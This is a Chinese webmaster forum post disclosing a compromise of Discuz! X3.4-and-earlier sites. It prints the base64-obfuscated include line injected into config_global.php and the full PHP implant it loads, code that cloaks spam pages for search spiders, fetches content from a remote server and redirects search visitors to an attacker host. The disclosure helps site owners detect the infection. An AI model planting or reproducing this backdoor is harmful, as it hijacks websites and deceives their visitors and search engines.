2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

Discuz! X3.4版本以下/config/config_global.php注入漏洞@include(base64_decode公示 discuz 交流

游客1 游客组

本帖最后由 民审-M 于 2018-9-28 16:22 编辑

Discuz! X3.4版本以下/config/config_global.php注入漏洞:
@include(base64_decode('L3RtcC8uVGVzdC11bml4L2NsaWVudC5waHA='));

解析
写入服务器/tmp/.Test-unix/client.php
远程控制注入地址:
Quotewww.womendemengxiang.com

Quotegbk.baidu901.com

Quote9a9vj.com:8888



内容:

<?php
ob_start("ob_gzhandler");
ini_set('html_errors',false);
ini_set('display_errors',false);
define("APP_INCLUDE_FLAG","TRUE");
define('APP_JACK_CHARSET','GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT','/tmp/.X11-unix/');
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'z'.rand(1,6).'');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'m');
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'w');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'ms');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'b');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'b2');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'b3');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hh');
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');        
define('APP_JACK_MAX','15');
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'a');

function App_GetLink(){
        $link = array();
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        $link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        return $link[mt_rand(0,count($link)-1)];
}

function App_GetSelf(){
$link = array();
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        $link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        return $link[mt_rand(0,count($link)-1)];
}
//返回图片
function getImg(){
        return 'http://www.womendemengxiang.com/imgr/images/'.rand(1,260).".jpg";
}
$my_app = new missclient();
$my_app->run();

class missclient{
        
        public $show_spider;
        public $jump_ref;
        public $http_ref_filter;
        public $jump_url = "";
        public $domain = "";
        public $condition = "";
        public $app_server = "";
        public $log_spider = "";
        public $cur_spider = "";
        public $allow_ip = "";
        public $isCache = false;

        public function run(){
                $this->domain = 'discuz';
                $this->jump_ref = explode("|","baidu.|haoso.|haosou.|bing.|sogou.|soso.|so.com|.sm.cn|spm=");
                $this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
                $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
                $this->condition = (($_GET['tid']> 1000000 && $this->isAllowdIp()) || ($_GET['fid']> 1000 && $this->isAllowdIp()) || ($_GET['mid']> 1 && $this->isAllowdIp()));
                $this->app_server = "http://gbk.baidu901.com/app.php";
                $this->isCache  = False;
                if($this->isSpider() && $this->isAllowdIp()){
                                if($this->condition){
                                        if($this->isCache){
                                                $relset_host = $this->getServerName();
                                                $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
                                                $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
                                                if(!@file_exists($dir)){
                                              mkdir($dir, 0777);
                                    }
                                                if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
                                                        $var = coreAppCache::read($cacheFile);
                                                        $page = file_get_contents(APP_JACK_TEMPLATE);
                                                        foreach($var as $key=>$v){
                                                                $flag = "{".$key."}";
                                                                $page = str_replace($flag,$v,$page);
                                                        }
                                                        echo $page;
                                                        exit();
                                                }
                                                else
                                                {        
                                                        //包含进APP即可
                                                        $currentPage = include(APP_JACK_APPFILE);
                                                        if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
                                                                $var = self::cut($currentPage,"<explode>","</explode>");
                                                                $var = coreAppCache::decode($var);
                                                                $page = file_get_contents(APP_JACK_TEMPLATE);
                                                                foreach($var as $key=>$v){
                                                                        $flag = "{".$key."}";
                                                                        $page = str_replace($flag,$v,$page);
                                                                }
                                                                echo $page;
                                                                @coreAppCache::writenocode($currentPage,$cacheFile);
                                                        }
                                                }
                                                die();
                                        }
                                        else
                                        {
                                                $currentPage = include(APP_JACK_APPFILE);
                                                echo $currentPage;
                                                die();
                                        }
                                }
                                else
                                {

                                        $this->_uncondition_hook();
                                }
                }
                else
                {        
                        if($this->isRef() && $this->condition){
                                $this->Jump();
                        }
                        else
                        {
                                $this->_unSpider_hook();
                        }
                }
        }

        public function isAllowdIp(){
                $ip = $this->clientIp();
                $non_list = explode("|",$this->allow_ip);
                foreach($non_list as $iplist){
                        if(@stristr($ip,$iplist)){
                                return false;
                        }
                }
                return true;
        }

        public function clientIp(){
                if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
                        $onlineip = getenv('HTTP_CLIENT_IP');
                } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
                        $onlineip = getenv('HTTP_X_FORWARDED_FOR');
                } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
                        $onlineip = getenv('REMOTE_ADDR');
                } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
                        $onlineip = $_SERVER['REMOTE_ADDR'];
                }
                preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
                $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
                unset($onlineipmatches);
                return $onlineip;
        }

        public function isSpider(){
                $bots = array(
                                                //'Baidu'        => 'baiduspider',
                                                'Sogou'        => 'sogou',
                                                //'Haoso'        => 'haosouspider',
                                                //'360spider'        => '360spider',
                                                'bingbot'        => 'bingbot'
                 );
                $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
                foreach ($bots as $k => $v){
                        if (stristr($userAgent,$v)){
                                if(!empty($this->log_spider)){
                                        @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
                                }
                                $this->cur_spider = $k;
                                return true;
                                break;
                        }
                }
                return false;        
        }

        public function isRef(){
                $ref = strtolower(@$_SERVER['HTTP_REFERER']);
                if(isset($_COOKIE["domain-filter-bypass"])){
                        return false;
                }
                
                if(!$this->isAllowdIp()){
                        setcookie("domain-filter-bypass", "lol", time() + 259200);
                        return false;
                }

                foreach($this->http_ref_filter as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                setcookie("domain-filter-bypass", "lol", time() + 259200);
                                return false;
                        }
                }
        
                foreach($this->jump_ref as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                return true;
                        }
                }
        }

        public function getServerName() 
        { 
                $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']); 
                if( strpos($ServerName,'http://') ) 
                { 
                        return str_replace('http://','',$ServerName); 
                } 
                return $ServerName; 
        }

        public function getPage(){
                if($this->isCache){
                        $cache="cached";
                }
                $url  = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
                return $this->HttpVisit($url);
        }

    public function HttpVisit($weburl) {
        $remote_data = NULL;
        if (function_exists('curl_exec')) {
            $curl = @curl_init();
            @curl_setopt($curl, CURLOPT_URL, $weburl);
            @curl_setopt($curl, CURLOPT_HEADER, 0);
            @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
            @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            $remote_data = @curl_exec($curl);
            @curl_close($curl);
        } else {
            if (function_exists('stream_context_create')) {
                $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
                $http_header = @stream_context_create($header_array);
                $remote_data = @file_get_contents($weburl, false, $http_header);
            } else {
                $temp_url = explode("/", $weburl);
                $new_url = $temp_url[2];
                $http_port = 80;
                $get_file = substr($weburl, strlen($new_url) + 7);
                if (strstr($new_url, chr(58))) {
                    $s_var_array['td'] = explode(chr(58), $new_url);
                    $new_url = $s_var_array['td'][0];
                    $http_port = $s_var_array['td'][1];
                }
                $fsock_result = @fsockopen($new_url, $http_port);
                @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
                while (!feof($fsock_result)) {
                    $remote_data .= fgets($fsock_result, 1024);
                }
                @fclose($fsock_result);
            }
        }
        return $remote_data;
    }

        public function Jump(){
                if($this->isAllowdIp()){
                        $domain  = str_replace(".","_",$this->domain);
                        header('Location: http://9a9vj.com:8888/?jpb_'.$domain);
                        exit;
                }
        }
        
        public function _uncondition_hook(){
                $array = array();
                for($a=0;$a<100;$a++){
                        echo '<a href="'.App_GetLink().'"></a>'."\n";
                }
        }

        public function _unSpider_hook(){
                //
        }


        public function strStartWith($needle, $haystack){
            return (substr($haystack, 0, strlen($needle))==$needle);
        }

        public function rndStr($length=8){
                $str = null;
                $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
                $max = strlen($strPol)-1;
                for($i=0;$i<$length;$i++){
                        $str.=$strPol[rand(0,$max)];
                }
                return $str;
        }

        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

class coreAppCache{
        //写入缓存
        public function write($file,$filename){
                return file_put_contents($filename,self::encode($file));
        }
        public function writenocode($file,$filename){
                return file_put_contents($filename,$file);
        }
        public function read($filename){
                $content = file_get_contents($filename);
                if(stristr($content,"</explode>")){
                        $content = self::cut($content,"<explode>","</explode>");
                }
                return self::decode($content);
        }

        public function encode($file){
                return base64_encode(gzcompress(serialize($file))); 
        }

        public function decode($file){
                return unserialize(gzuncompress(base64_decode($file))); 
        }
        
        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

?>


站长窝论坛版权声明 1、本帖标题:Discuz! X3.4版本以下/config/config_global.php注入漏洞@include(base64_decode公示
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由游客1在站长窝论坛《程序综合区》版块原创发布, 转载请注明出处!
评论
最新回复 (12)
返回
发新帖